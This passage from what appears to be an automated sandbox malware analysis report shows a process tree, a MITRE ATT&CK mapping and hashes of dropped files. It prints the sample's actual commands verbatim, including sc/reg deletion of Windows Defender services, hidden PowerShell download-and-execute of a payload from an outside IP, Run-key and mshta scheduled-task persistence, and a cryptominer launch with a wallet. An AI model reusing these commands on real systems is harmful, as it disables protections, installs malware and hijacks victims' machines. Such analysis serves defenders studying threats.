        PID:9116
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:9168
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:9188
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4844
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:824
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:9256
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:9300
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:9332
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:9376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:9392
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:9424
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:9456
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:9508
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:9540
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:9568
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:9616
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:9684
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:9708
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:9748
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:9792
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:9816
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:9868
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:9900
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:9932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:9972
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:10000
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:10036
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:10092
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:10132
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:10200
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:10232
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5988
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:10268
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:10320
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:10376
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:10440
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:10496
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4316
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:10572
      - C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"
        6⤵
        Executes dropped EXE
        
        PID:9624
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
        7⤵
        Modifies registry key
        
        PID:9220
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 470" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe\" /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:9076
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 470" /t REG_BINARY /d 020000000000000000000000 /f
        7⤵
        Modifies registry key
        
        PID:8832
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 470" /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:4760
      - C:\Users\Admin\AppData\Local\Temp\10318740101\32ae679328.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10318740101\32ae679328.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn eB0mnmaUjTX /tr "mshta C:\Users\Admin\AppData\Local\Temp\WRRVcfKnF.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5936
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn eB0mnmaUjTX /tr "mshta C:\Users\Admin\AppData\Local\Temp\WRRVcfKnF.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:7184
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\WRRVcfKnF.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7312
        
        C:\Users\Admin\AppData\Local\TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
        
        "C:\Users\Admin\AppData\Local\TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:8072
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:9028
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "hJczxmaRANm" /tr "mshta \"C:\Temp\QjkFubwOG.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:9312
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\QjkFubwOG.hta"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:9344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:9460
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:9880
      - C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Modifies system certificate store
        
        PID:10460
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:10548
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=20
        7⤵
        
        PID:10844
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:10824
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:10936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM winhost.exe
        7⤵
        Kills process with taskkill
        
        PID:12648
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=80
        7⤵
        
        PID:12756
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:13644
      - C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:10824
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:10904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11152
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:10964
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
        8⤵
        
        PID:11716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:11600
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:11748
        
        C:\Users\Admin\AppData\Local\Temp\{abd13f11-c9c9-42a6-8e0e-0fb97fe19388}\60de7449.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{abd13f11-c9c9-42a6-8e0e-0fb97fe19388}\60de7449.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\{14239a62-23d0-482c-9baf-f89af992096b}\2d6e17ce.exe
        
        C:/Users/Admin/AppData/Local/Temp/{14239a62-23d0-482c-9baf-f89af992096b}/\2d6e17ce.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        
        PID:4316
      - C:\Users\Admin\AppData\Local\Temp\10318990101\d14d403b89.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10318990101\d14d403b89.exe"
        6⤵
        
        PID:10532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:10928
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:11000
      - C:\Users\Admin\AppData\Local\Temp\10319000101\2e71cd1e91.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319000101\2e71cd1e91.exe"
        6⤵
        
        PID:12168
      - C:\Users\Admin\AppData\Local\Temp\10319010101\b75cac8325.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319010101\b75cac8325.exe"
        6⤵
        
        PID:1916
      - C:\Users\Admin\AppData\Local\Temp\10319020101\dc52c17509.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319020101\dc52c17509.exe"
        6⤵
        
        PID:6748
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:14040
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:13924
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:13864
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:3156
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:3356
      - C:\Users\Admin\AppData\Local\Temp\10319030101\0d382baa50.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319030101\0d382baa50.exe"
        6⤵
        
        PID:7160

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1836 -ip 1836
1⤵
PID:2232

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:14080

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1236

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:11464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_b5e51aa1a_arkmon.sys

Filesize
390KB

MD5
7c924dd4d20055c80007791130e2d03f

SHA1
072f004ddcc8ddf12aba64e09d7ee0ce3030973e

SHA256
406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

SHA512
ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

Download Submit
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
1.9MB

MD5
9719bdd6bda2aa3736d36c284341b793

SHA1
d5526134bd3ffcb75ea31d2bf492db37439928f6

SHA256
3c8aa9cd25db23f2c9b64554f5e9fe43cbe76c0082e33a1e67ce9d257bb7a179

SHA512
4560752c79cf4bbc0a551999df72decaa4da49140c63bfe6cd1c06dd1b11027c47644e45095bd081c95239a661bd93dbcb6996941553d88e3c55cd37c15d04c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
7558714dbcf160f0ba824fd5b2d9f1df

SHA1
cd4a4aee3cf41a36de9236610b185673a6856231

SHA256
ea41f4d6a79cd6fceda73886b2d72bd0265058ff878b390c672690e351805ae3

SHA512
3f3595257fd12b16378fea984de56d6c5226ccf397713a04b968a3fed271a8d1b22c3afc76f9eb35a46d5661b1cb55da6ae7f660ba3d6a768a1242d5a8168a62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
add6a1903da88f622a3bf1f0b2f4e722

SHA1
89cebc9ac98d5e2c8558e8320cc11053815b9c59

SHA256
5b45f8be871cb97c4aa636f2820a3d9a721511a317a1e45a518a942b66d556ca

SHA512
e83591fa8b9e934f18c798c6381e714d57974284b42cc6ba9de23a62284fce7f434def4b3feadc9a4b8fb19221f4197589c0e243a8dabf3c98b5d95e99767b64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
c37f9d2c357647fca20f2eaa89c18edd

SHA1
cfd1035ed2d057c317b48546f467209cbbe15f2e

SHA256
2ea3a0b7e6145fd110653b1a77cb827ad7e4a145c29378344bd3d28f595b2072

SHA512
3563f4aca9e47f35de8cb38e42a3c0448bb3ec4c9183fa392abc28fee4ca08bf16da028ffbf31cf0c0f8301ed810238961e745590e5c71621bc5a2a889dd12f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
dc4aeeda3be664bc87655b4444474905

SHA1
b98158a9413159ed96d68949f64f79a52ff12ce3

SHA256
1afd2786c2972ed817f1545f173123f708f1221b86dd9fb5af53312cfe8ff480

SHA512
ec4eb7a8601cf5f3a6d10f688ae6b1517afd219a759eed3f778b66390532e9b7a14213584d72b7087f2f3fc202140888061dadce1a759ab02626f4f7f14af51e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
9eba88e49e0374f4e12de43638650e58

SHA1
b07fadc2b778a8fd9cf21c65b27f2d92a2288b94

SHA256
255f54785170bba5629bbef0b194b680393d5675f3b7e855b0b26b1f6b8083bb

SHA512
964ef12bfe91f229d546d6ffaed698e32ba5e3e1bad135d4c2b6b685f52546654efed74072722d0e4ca90aa098177688d7f58446ce010be57328c1b313f2a43a

Download Submit
C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE

Filesize
1.8MB

MD5
ac89979dff72902b982fbaff22d04814

SHA1
e1aacec04a15d027395fb3b950f90b149b4f8b13

SHA256
78ed654b665c1354ddc701fa2cea28c0aef333392468161edd0f0121acad04c3

SHA512
f61234181d143999ea5692cc433a8cb97901ed93fdff6be2cb453efb16ccbcefa4143ddc8341a63b444280a001d3afb878f5fce28806ff15fe8f5f7dc0a2e779

Download Submit
C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe

Filesize
1.4MB

MD5
06b18d1d3a9f8d167e22020aeb066873

SHA1
2fe47a3dbcbe589aa64cb19b6bbd4c209a47e5aa

SHA256
34b129b82df5d38841dc9978746790673f32273b07922c74326e0752a592a579

SHA512
e1f47a594337291cddff4b5febe979e5c3531bd81918590f25778c185d6862f8f7faa9f5e7a35f178edc1666d1846270293472de1fc0775abb8ae10e9bda8066

Download Submit
C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe

Filesize
1.7MB

MD5
84408fe8f2675bd4b8eb6fae7dcaeffa

SHA1
b0be79ab3ee1ace5da30883a0b5bae5b9ee18a29

SHA256
78b08e1acf62ba41b2e41b76baeb269ec6550353fa6d7acd9518b769477696d3

SHA512
d64f8f85a1fda98d91481d32b4119f20de6376f58aa8f7dae5cf74344d927d545e701cc410a8bf1dcdd4b14bf320760f57b2697a41b989175c2c4496ca99025d

Download Submit
C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe

Filesize
1.1MB

MD5
b38cd06513a826e8976bb39c3e855f64

SHA1
79eef674168786ff0762cfdb88a9457f8b518ed5

SHA256
2e0b126dd788c027ca69b01335d4a08da28987c3c4296a3523d947da3c12cdc2

SHA512
6944ba859359f162e1fc5b2c2b14c7ab1fb9cf5c0a83d7d81d3de722344e8ae3efc300fe369a87d550645de93de4f02ed92c47718cce6fe834fdaa6b543730c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe

Filesize
1.2MB

MD5
398ab46e27982dfd2028bf42f4832fa8

SHA1
32c00252fc57a6fc31c2b35915f3c8a2061305ca

SHA256
033d584799e9ce55c7fc62adb86a6738a42fe2fa5f21035b66ee7b6c4c1fd6e1

SHA512
a75fc40c3861048afad124e5b88d164e91b722365305869977f48c20ffa3129e546dd70c68bc6e7c459ec7ad89c94b02cb20e746a2b84a44ab182acf4d971b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe

Filesize
1.2MB

MD5
e3f8c373ee1990eecfc3a762e7f3bc3b

SHA1
888b6c33b4f66af32b41c3f0dec1f6c189f61fba

SHA256
41b06a71f35f168f8772eb1d2cf420ebcd0afe2259728fd92d5fe4d0ea99ca6a

SHA512
3a7f8cd9112ae71a90c168c8501f19d61b92123b67953e70189459ac189b8460dba8686fc850f5afe0a14798891f74a50c9697ea1ce1841ad6941fc0d4806b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe

Filesize
327KB

MD5
f0676528d1fc19da84c92fe256950bd7

SHA1
60064bc7b1f94c8a2ad24e31127e0b40aff40b30

SHA256
493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32

SHA512
420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10317250101\rBUNkND.exe

Filesize
1.7MB

MD5
ac8bde872e0a5fad5b498eea445c814a

SHA1
c70b5e4b7711ddd6f08c982e8411095b02b18e54

SHA256
9dd44670063223ac111bc2bac73773d5d2aea27b74f20ded07fe3713edf30e81

SHA512
36212baec6fba22891883435448e9a4ef68385c8fe9c902ccab654ff39be1f0947113eb44aa51f302136ff61b91d9e4a7e495b4da3312b8926d73abd74367d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe

Filesize
7.5MB

MD5
f391dc5c2a7d2b735e53d801978a3887

SHA1
fcb208a6f821a1b6f58fb21cae278b4a43775165

SHA256
613504a0c04be939c798897104cd1a139bc67b61921f41c7efb0cfb1e4f2cb89

SHA512
b55e7f91238ae3a3ba5ae3d4f9eccf390136a40c7c7647cb8fc4b2af23985a20d049ab8e111607c217a8da3a8899673606829ca648049da05ade9c639c814260

Download Submit
